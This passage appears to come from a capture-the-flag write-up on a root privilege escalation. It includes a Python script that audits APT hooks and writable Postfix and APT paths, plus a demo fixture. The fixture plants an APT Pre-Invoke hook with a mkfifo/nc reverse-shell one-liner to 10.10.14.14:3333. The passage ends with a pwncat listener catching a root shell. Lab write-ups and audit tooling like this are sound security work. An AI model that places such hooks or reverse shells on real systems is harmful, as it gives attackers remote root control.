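        path = os.path.join(confdir, name)
        if not os.path.isfile(path):
            continue
        with open(path, errors="replace") as fh:
            for directive, command in HOOK_RE.findall(fh.read()):
                hits.append((name, directive, command))
    return hits


def find_loosely_writable(root):
    """Return paths under root (relative to it) whose mode grants write to
    group or others. Symlinks are skipped because their mode bits mean nothing."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                found.append(os.path.relpath(path, root))
    return sorted(found)


def demo():
    """Constructed fixture reproducing both weaknesses in a temp directory:
    a group-writable Postfix filter script and a group-writable apt.conf.d
    holding the Pre-Invoke hook from the write-up. Returns the two reports."""
    with tempfile.TemporaryDirectory() as tmp:
        apt = os.path.join(tmp, "apt.conf.d")
        postfix = os.path.join(tmp, "postfix")
        os.makedirs(apt)
        os.makedirs(postfix)
        files = {
            os.path.join(apt, "20auto-upgrades"):
                'APT::Periodic::Update-Package-Lists "1";\n',
            os.path.join(apt, "shell"):
                'APT::Update::Pre-Invoke: {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f'
                '|/bin/sh -i 2>&1|nc 10.10.14.14 3333 >/tmp/f"};\n',
            os.path.join(postfix, "disclaimer"):
                '#!/bin/sh\n# content filter invoked by Postfix (mock)\n',
        }
        for path, body in files.items():
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, 0o644)  # explicit modes so the result does not depend on umask
        os.chmod(postfix, 0o755)
        os.chmod(apt, 0o775)                                  # group can drop files here
        os.chmod(os.path.join(postfix, "disclaimer"), 0o774)  # group can edit the script
        return find_apt_hooks(apt), find_loosely_writable(tmp)


if __name__ == "__main__":
    hooks, writable = demo()
    for hit in hooks:
        print("apt hook:", hit)
    for path in writable:
        print("group/other writable:", path)
```

On a live host the same two functions run over the real locations, find_apt_hooks("/etc/apt/apt.conf.d") and find_loosely_writable("/etc/postfix"), and the second one is worth pointing at /etc/apt as well, since a writable hook directory is exactly what the APT step needed.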

Grab the root flag once the hook fires:

sudo pwncat -l 10.10.14.14 3333
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# pwd
/tmp
# cd /root
# ls
root.txt
snap